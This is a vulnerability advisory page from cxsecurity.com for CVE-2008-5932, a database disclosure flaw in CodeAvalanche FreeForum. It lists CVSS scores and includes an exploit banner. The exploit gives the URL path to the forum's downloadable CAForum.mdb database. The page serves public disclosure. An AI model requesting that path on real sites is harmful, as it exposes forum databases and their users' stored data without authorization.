Bug: CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vulnerability ( Ascii Version )

Search:
WLB2

CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vulnerability

Published
Credit
Risk
2009.01.23
Ghost Hacker
Medium
CWE
CVE
Local
Remote
CWE-264
CVE-2008-5932
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

####################################################################################################
# FreeForum Database Disclosure Vulnerability #
# © Ghost Hacker - REAL-H.COM #
####################################################################################################
#[~] Author : Ghost Hacker #
#[~] Homepage : http://Real-h.com #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com #
#[~] Name Script : FreeForum #
#[~] Download : http://www.truecontent.info/codeavalanche/asp-forum-script.php #
####################################################################################################
#[~]Exploit #
# http://xxxx.com/[path]/CAForum/_private/CAForum.mdb #
####################################################################################################
#[~]Greets : &nbs p; #
# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi #
# All Members Real-h.com and v4-team.net , All My Friends #
####################################################################################################

References:

http://www.milw0rm.com/exploits/7450
http://secunia.com/advisories/33100

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version